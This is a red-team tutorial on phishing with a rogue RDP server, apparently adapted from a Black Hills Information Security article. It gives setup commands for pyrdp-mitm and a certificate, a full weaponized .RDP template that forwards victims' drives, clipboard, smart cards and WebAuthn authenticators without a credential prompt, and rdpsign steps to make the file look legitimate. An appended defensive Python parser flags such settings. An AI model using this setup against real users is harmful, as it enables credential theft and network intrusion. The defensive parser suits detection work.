Phishing with Rogue RDP. Using built-in Windows tools to get into the network
Rogue RDP – Revisiting Initial Access Methods - Black Hills Information Security
EDR and XDR have significantly improved the level of protection against phishing. Classic document mailings almost don't work anymore. As an alternative, Rogue RDP as a delivery tool combined with Living off the Land Binaries for initial access to the customer's network is a good option.
The technique leverages a malicious RDP server, an RDP relay, and a weaponized .RDP connection file that forces unsuspecting victims into connecting and forwarding control over some parts of their machine.
<aside> ⚠️ Requirements
To implement Rogue RDP, you need a Windows machine with a public IP address. Then install WSL (Windows Subsystem for Linux) and restart the system.
</aside>
<aside> ⚠️ Use a signed .RDP file to gain more visual legitimacy.
</aside>
Set up Windows Machine:
Create a Windows machine with a public IP address.
Install WSL (Windows Subsystem for Linux) for tool setup:
wsl --install --enable-wsl1
sudo apt update
sudo apt install python3 python3-pip pipx git libaugeas0
pip install certbot
pipx install pyrdp-mitm
Obtain and Set Up SSL Certificate:
Generate SSL certificate for the rogue domain to add legitimacy:
sudo certbot certonly --cert-name malrdp -d <your.domain.com> --register-unsafely-without-email
Convert to PFX format:
sudo openssl pkcs12 -inkey /etc/letsencrypt/live/malrdp/privkey.pem -in /etc/letsencrypt/live/malrdp/fullchain.pem -export -out malrdp.pfx
Install Certificate on Windows:
Import malrdp.pfx into the Personal store, then open certmgr.msc > Personal > Certificates > double-click the certificate > Details > Thumbprint and note the thumbprint; it is needed for signing.

Create RDP File:
Use the following configuration template for the .RDP file:
screen mode id:i:1
use multimon:i:0
desktopwidth:i:1920
desktopheight:i:1080
session bpp:i:32
winposstr:s:0,1,1904,23,3840,1142
compression:i:1
keyboardhook:i:2
audiocapturemode:i:0
videoplaybackmode:i:1
connection type:i:7
networkautodetect:i:1
bandwidthautodetect:i:1
displayconnectionbar:i:1
enableworkspacereconnect:i:0
disable wallpaper:i:0
allow font smoothing:i:0
allow desktop composition:i:0
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
bitmapcachepersistenable:i:1
full address:s:<YOUR_DOMAIN_COM>:443
audiomode:i:0
redirectprinters:i:1
redirectcomports:i:0
redirectsmartcards:i:1
redirectwebauthn:i:1
redirectclipboard:i:1
redirectposdevices:i:0
autoreconnection enabled:i:1
authentication level:i:2
prompt for credentials:i:0
negotiate security layer:i:1
remoteapplicationmode:i:0
alternate shell:s:
shell working directory:s:
gatewayhostname:s:
gatewayusagemethod:i:4
gatewaycredentialssource:i:4
gatewayprofileusagemethod:i:0
promptcredentialonce:i:0
gatewaybrokeringtype:i:0
use redirection server name:i:0
rdgiskdcproxy:i:0
kdcproxyname:s:
enablerdsaadauth:i:0
redirectlocation:i:0
drivestoredirect:s:*
Sign RDP File:
Use rdpsign.exe to sign the RDP file, making it appear more legitimate:
rdpsign.exe /sha256 YOUR_CERTIFICATE_THUMBPRINT .\<filename>.rdp
Check that it is actually signed: a signed file gains signscope:s: and signature:s: lines at the end.
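From the defender's side, the same .RDP format is what a mail gateway or an incident responder has to triage when such a file arrives as an attachment. The following is an added example, not code from this note or from Black Hills: a small parser for the key:type:value lines of an .rdp file that flags the resource-redirection settings used in the template above, notes a non-standard port on the full address, and checks for the signscope/signature fields that rdpsign.exe appends (which is what "check that it is actually signed" looks for). The sample file is constructed for the example; its host name is a placeholder, and the signature value in the second sample is a dummy string, not a real signature.

```python
"""Triage parser for .RDP connection files (added example; sample data is
constructed, host names and signature values are placeholders)."""

from dataclasses import dataclass, field

# Settings that hand the remote side access to local resources. A value of 1
# (or a non-empty drive list such as "*" for drivestoredirect) exposes the
# named resource to the server the file points at.
RISKY_REDIRECTS = {
    "drivestoredirect": "local drives are mapped into the remote session",
    "redirectclipboard": "clipboard is shared with the remote host",
    "redirectsmartcards": "smart cards are forwarded to the remote host",
    "redirectwebauthn": "WebAuthn/FIDO authenticators are forwarded",
    "redirectprinters": "local printers are forwarded",
    "redirectcomports": "COM ports are forwarded",
    "redirectposdevices": "POS devices are forwarded",
}


@dataclass
class RdpReport:
    settings: dict = field(default_factory=dict)
    findings: list = field(default_factory=list)
    signed: bool = False


def parse_rdp(text: str) -> dict:
    """Parse key:type:value lines into a dict. Type 'i' values become ints,
    everything else stays a string. Malformed lines are skipped rather than
    raising, because a mailed .rdp file is untrusted input."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":", 2)  # the value may itself contain ':' (host:port)
        if len(parts) != 3:
            continue
        key, typ, value = parts[0].strip().lower(), parts[1].strip(), parts[2]
        if typ == "i":
            try:
                settings[key] = int(value)
            except ValueError:
                continue
        else:
            settings[key] = value
    return settings


def assess_rdp(text: str) -> RdpReport:
    """Flag redirections, a non-standard port and the absence of a signature."""
    report = RdpReport(settings=parse_rdp(text))
    s = report.settings
    for key, why in RISKY_REDIRECTS.items():
        val = s.get(key)
        if key == "drivestoredirect":
            if isinstance(val, str) and val.strip():
                report.findings.append(f"{key}={val!r}: {why}")
        elif val == 1:
            report.findings.append(f"{key}=1: {why}")
    # prompt for credentials:i:0 means the client connects without asking.
    if s.get("prompt for credentials") == 0:
        report.findings.append("prompt for credentials=0: connects without a credential prompt")
    # RDP normally listens on 3389; a file pointing at 443 is worth a look.
    _host, sep, port = s.get("full address", "").rpartition(":")
    if sep and port.isdigit() and int(port) != 3389:
        report.findings.append(f"full address uses port {port} instead of 3389")
    # rdpsign.exe appends signscope and signature fields. Their presence only
    # proves who signed the file, not that the settings above are safe.
    report.signed = bool(s.get("signscope")) and bool(s.get("signature"))
    return report


# Constructed sample mirroring the template above (placeholder host name).
SAMPLE_RDP = """\
screen mode id:i:1
full address:s:rdp.example.invalid:443
redirectclipboard:i:1
redirectsmartcards:i:1
redirectwebauthn:i:1
redirectprinters:i:1
redirectcomports:i:0
prompt for credentials:i:0
drivestoredirect:s:*
"""

# Same file with dummy signature fields appended (placeholder values, not a
# real rdpsign output) to show the signed/unsigned distinction.
SAMPLE_RDP_SIGNED = SAMPLE_RDP + "signscope:s:Full Address\nsignature:s:PLACEHOLDER_SIGNATURE_BLOB\n"

if __name__ == "__main__":
    for name, data in (("unsigned", SAMPLE_RDP), ("signed", SAMPLE_RDP_SIGNED)):
        r = assess_rdp(data)
        print(f"[{name}] signed={r.signed}")
        for f in r.findings:
            print("  -", f)
```

Run it over an attachment instead of the samples by passing the file contents to assess_rdp; an empty findings list together with signed=True is the only combination that needs no further look, and even then the signer identity still has to be checked separately.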
